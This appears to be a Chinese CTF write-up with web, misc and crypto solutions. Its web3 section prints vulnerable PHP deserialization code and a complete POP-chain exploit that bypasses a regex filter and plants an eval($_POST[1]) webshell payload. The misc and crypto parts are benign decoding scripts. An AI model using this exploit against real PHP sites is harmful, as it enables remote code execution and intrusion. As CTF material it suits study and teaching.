web
web1
CVE直接打
web2
远程文件包含
web3
www.zip 源码泄露(备份文件可直接下载)
解压后得到 demo.php
<?php
// Gadget 1 of the POP chain: reading a property that Water does not declare
// lands in __get(), which calls whatever sits in $waterfall as a function.
// An object with __invoke() (Circle below) is therefore "called" here.
class Water{
public $waterfall;
public function __construct(){
$this->waterfall = array();
}
// $value (the missing property's name) is ignored; only $waterfall matters.
// After unserialize() $waterfall is attacker-controlled, not the array set above.
public function __get($value){
$function = $this->waterfall;
return $function();
}
}
// Final gadget / sink: __invoke() forwards the protected $dash to runc(),
// which eval()s it. Protected properties are still restored from a
// serialized payload, so after unserialize() $dash is attacker-controlled
// and this is the code-execution primitive the chain aims for.
class Circle{
public $daemon;
protected $dash;
public function __toString(){
return $this->daemon;
}
// Echoes the code before evaluating it, so the payload is reflected in the
// response. The @ only suppresses eval() warnings; it does not sandbox anything.
public function runc($value){
echo $value;
@eval($value);
}
// Reached when a Circle is used as a callable (see Water::__get()).
public function __invoke(){
$this->runc($this->dash);
}
}
// Gadget 2: string conversion reads ->horis on $link. When $link is a Water
// (which declares no $horis), that read triggers Water::__get().
class Range{
public $horis;
public $link;
public function __construct($link="link"){
$this->link = $link;
echo $link;
}
public function __toString(){
return $this->link->horis;
}
}
// Entry point of the chain. __wakeup() runs right after unserialize() and
// compares $secret with the loose `!=` against a string literal: when
// $secret holds an object that defines __toString(), PHP string-converts
// it before comparing, so a Range placed in $secret has its __toString()
// invoked here -- before the assignment below ever overwrites it.
class Sliver{
public $secret;
public $resty;
public function __construct($nice="wow"){
$this->secret = $nice;
echo "My secert --- ".$this->secret."<br>";
}
// Blocklist on $secret (looks like a scheme/traversal filter). By the time
// the object is torn down, __wakeup() has already reset $secret to the
// literal 'circle', which itself matches the regex, hence the message;
// the gadget objects are never inspected by this check.
public function __destruct(){
if(preg_match("/circle|gopher|http|file|ftp|https|dict|\.\./i", $this->secret)) {
echo "no~no~no~";
}
}
// Intended as a "fix-up", but the comparison is the trigger, not a guard.
function __wakeup(){
if ($this->secret != 'circle') {
$this->secret = 'circle';
}
}
}
// Source disclosure by design (challenge); the attack surface is below.
highlight_file(__FILE__);
$data = $_GET['data'];
if(isset($data)){
// Filter: every query-string value is re-parsed from REQUEST_URI and the
// request is rejected if a value *begins* with "O" (case-insensitive),
// i.e. a top-level serialized object. The regex is anchored at the start
// only, so a payload whose outermost element is an array ("a:2:{...}")
// carries the same objects through untouched.
$url = parse_url($_SERVER['REQUEST_URI']);
parse_str($url['query'],$q);
foreach($q as $v)
{
if(preg_match("/^O/i",$v))
{
die('YOU ARE hacker!!!');
exit();
}
}
// unserialize() on attacker-supplied input: every class above can be
// instantiated with attacker-chosen properties and its __wakeup() /
// __destruct() run. The result is discarded, so destructors fire at once.
// The real fix is not a stricter regex but never deserializing user data
// (e.g. json_decode() instead).
unserialize($data);
}
?>
简单的反序列化POP链构造
需要绕过的点
- query 里每个参数值都不能以 O 开头(正则 /^O/i 只检查开头)=> 把对象放进数组里再序列化,payload 以 a: 开头即可绕过
- __wakeup 里用的是宽松比较 `$this->secret != 'circle'`:当 secret 是带 __toString 的对象时,PHP 会先把它转成字符串再比较,因此链子可以从 __wakeup 直接跳到 Range::__toString
接着就是构造pop链,链子很简单,也是线性的
<?php
/**
 * Local stand-in for the target's Water class.
 *
 * Only the property layout matters for serialize(); $waterfall will hold
 * the Circle that the target's __get() ends up calling.
 */
class Water
{
    public $waterfall = null;
}
/**
 * Local stand-in for the target's Circle class.
 *
 * Property order and visibility must match the target so the serialized
 * form is accepted; $dash is protected there too, which is why the final
 * payload has to be urlencoded (its serialized name contains NUL bytes).
 */
class Circle
{
    public $daemon = null;
    protected $dash;

    public function __construct()
    {
        // Stage-2 payload: the target's runc() eval()s this string, which
        // in turn eval()s whatever arrives in POST field "1".
        $this->dash = 'eval($_POST[1]);';
    }
}
/**
 * Local stand-in for the target's Range class.
 *
 * $link will point at the Water object; $horis stays null because the
 * whole point is that the target reads a property Water does not have.
 */
class Range
{
    public $horis = null;
    public $link = null;
}
/**
 * Local stand-in for the target's Sliver class (the chain's entry point).
 *
 * $secret receives the Range object so the target's __wakeup() comparison
 * string-converts it; $resty is unused but kept for layout parity.
 */
class Sliver
{
    public $secret = null;
    public $resty = null;
}
// Assemble the chain inside-out:
//   Sliver->secret = Range, Range->link = Water, Water->waterfall = Circle
// so that on the target, Sliver::__wakeup -> Range::__toString ->
// Water::__get -> Circle::__invoke -> Circle::runc -> eval.
$circle = new Circle();

$water = new Water();
$water->waterfall = $circle;

$range = new Range();
$range->link = $water;

$sliver = new Sliver();
$sliver->secret = $range;

// Wrap the object in an array so the serialized string starts with "a:"
// instead of "O:", which is what the target's /^O/i check rejects.
$payload = ['1', $sliver];

// urlencode is required: the protected $dash serializes with NUL bytes in
// its name, which would not survive a raw query string.
echo urlencode(serialize($payload));
完整调用链:Sliver::__wakeup => Range::__toString => Water::__get => Circle::__invoke => Circle::runc => eval
misc
misc1
第一步base64解密
第二步写脚本把数据每两个字节分为一组,组内两个字节互换位置
# -*- coding: utf-8 -*-
# @Time : 2022/9/10 9:11
# @Author : pysnow
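def swap_byte_pairs(data: bytes) -> bytes:
    """Reverse every 2-byte group of ``data`` (``ab cd`` -> ``ba dc``).

    A trailing odd byte is left in place, matching the original loop, which
    wrote whatever ``read(2)`` returned for the final chunk.

    Args:
        data: raw bytes of the input file.

    Returns:
        The same length of bytes with each adjacent pair swapped.
    """
    out = bytearray()
    for i in range(0, len(data), 2):
        out += data[i:i + 2][::-1]
    return bytes(out)


if __name__ == '__main__':
    # Open with context managers so the handles are closed even on error.
    # Output is opened 'wb' rather than the original 'ab': appending meant a
    # second run glued another copy onto the already-written PNG and
    # corrupted it.
    with open('base64.png', 'rb') as old:
        decoded = old.read()
    with open('new.png', 'wb') as new:
        new.write(swap_byte_pairs(decoded))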
第三步:
用 LSB 隐写提取脚本直接跑,密码就是万能和弦 4536251
crypto
crypto1
把 A 换成 -、B 换成 .,按摩斯电码解码,再把得到的密文丢到 quip 一键解替换密码
crypto2
密文 FvLFArGp[ovpxBpsssD]qCElwwoClsoColwpuvlqFv
对密文做 2 栏栅栏解密能看到 FLAG 关键词;根据提示 flag{uuid},uuid 的格式为 8-4-4-4-12
且只包含 a-f 和 0-9;密文里没有数字,猜测数字被替换成了字母表中的字母
opqrstuvwx
0123456789
upper => lower
l => -
8-4-4-4-12
大写字母直接替换对应的小写字母
# -*- coding: utf-8 -*-
# @Time : 2022/9/10 15:22
# @Author : pysnow
# Undo the substitutions: 'l' stood for '-', the square brackets for braces.
enc = 'FvLFArGp[ovpxBpsssD]qCElwwoClsoColwpuvlqFv'.replace('l', '-').replace('[', '{').replace(']', '}')

# The letters o..x stand for the digits 0..9 (a UUID may only hold a-f/0-9);
# every other character passes through unchanged.
DIGIT_LETTERS = 'opqrstuvwx'
res = enc.translate(str.maketrans(DIGIT_LETTERS, '0123456789'))

# Upper-case letters map straight to their lower-case counterparts.
print(res.lower())
f7lfa3g1{0719b1444d}2ce-880c-40c0-8167-2f7
观察可以发现右花括号后面就是 -4-4-4- 的形式,前面的部分是 2 栏栅栏加密的
因为要凑出 uuid 的结构,直接从第五位开始截取
栅栏解密得到 flag{7914d 和 7f3101b44},中间再拼上 2ce-880c-40c0-8167-2f7
flag{7914d2ce-880c-40c0-8167-2f77f3101b44}